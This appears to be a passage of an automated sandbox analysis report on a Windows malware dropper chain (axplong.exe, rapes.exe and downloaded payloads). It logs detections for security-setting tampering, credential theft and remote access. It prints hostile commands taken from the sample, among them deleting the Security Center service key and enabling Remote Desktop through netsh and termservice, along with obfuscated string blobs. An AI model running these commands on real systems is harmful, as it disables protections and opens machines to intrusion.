Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: rapes.exe, rapes.exe, 00000008.00000002.1534686061.00000000004CD000.00000040.00000001.01000000.0000000B.sdmp, rapes.exe, 0000000B.00000002.2559913702.00000000004CD000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: eProgram Manager
Source: axplong.exe, axplong.exe, 0000000A.00000002.1854984627.00000000008B4000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: ;@Program Manager
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 2_2_0069DCC1 cpuid 2_2_0069DCC1
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10358510101\39pazbF.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10358510101\39pazbF.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10359310101\Or1ARiR.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10359310101\Or1ARiR.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10359660101\xZRvIQ5.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10359660101\xZRvIQ5.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10359820261\martin.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\10359820261\martin.zip VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\SUAosT64HD.exe Code function: 1_2_004BCB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 1_2_004BCB1A
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 2_2_006865B0 LookupAccountNameA, 2_2_006865B0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 2_2_006C23D7 waveInStart,GetTimeZoneInformation, 2_2_006C23D7

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
Source: svchost.exe, 00000000.00000002.2562104386.0000021CD3902000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Files%\Windows Defender\MsMpeng.exe
Source: Null.28.dr Binary or memory string: processed file: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: svchost.exe, 00000000.00000002.2562104386.0000021CD3902000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: ssisd.sys.14.dr Binary or memory string: MsMpEng.exe
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Program Files\Windows Defender\MpCmdRun.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 00000008.00000002.1534580911.00000000002D1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.1444142824.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1830573894.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2559503167.00000000002D1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1535079215.00000000002D1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1494796029.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1484931931.0000000000721000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.1493744531.0000000004A90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 10.2.axplong.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.SUAosT64HD.exe.4a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.axplong.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.axplong.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1368603933.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1364938881.00000000004A1000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.1382830343.00000000049B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1854236360.0000000000681000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.1812065922.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2559760358.0000000000681000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1436302014.0000000000681000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 29.0.Rm3cVPI.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.Rm3cVPI.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Rm3cVPI[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\39pazbF[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\10358510101\39pazbF.exe, type: DROPPED

Remote Access Functionality

Source: Yara match File source: 29.0.Rm3cVPI.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.Rm3cVPI.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Rm3cVPI[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\39pazbF[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\10358510101\39pazbF.exe, type: DROPPED
Source: 3d9778a1ff.exe String found in binary or memory: net start termservice
Source: 3d9778a1ff.exe, 00000004.00000003.1444142824.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: 3d9778a1ff.exe, 00000004.00000003.1444142824.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: 3d9778a1ff.exe, 00000004.00000002.1484931931.0000000000721000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: net start termservice
Source: 3d9778a1ff.exe, 00000004.00000002.1484931931.0000000000721000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe String found in binary or memory: net start termservice
Source: rapes.exe, 00000007.00000002.1535079215.00000000002D1000.00000040.00000001.01000000.0000000B.sdmp String found in binary or memory: net start termservice
Source: rapes.exe, 00000007.00000002.1535079215.00000000002D1000.00000040.00000001.01000000.0000000B.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 00000007.00000003.1494796029.0000000004F70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: rapes.exe, 00000007.00000003.1494796029.0000000004F70000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF 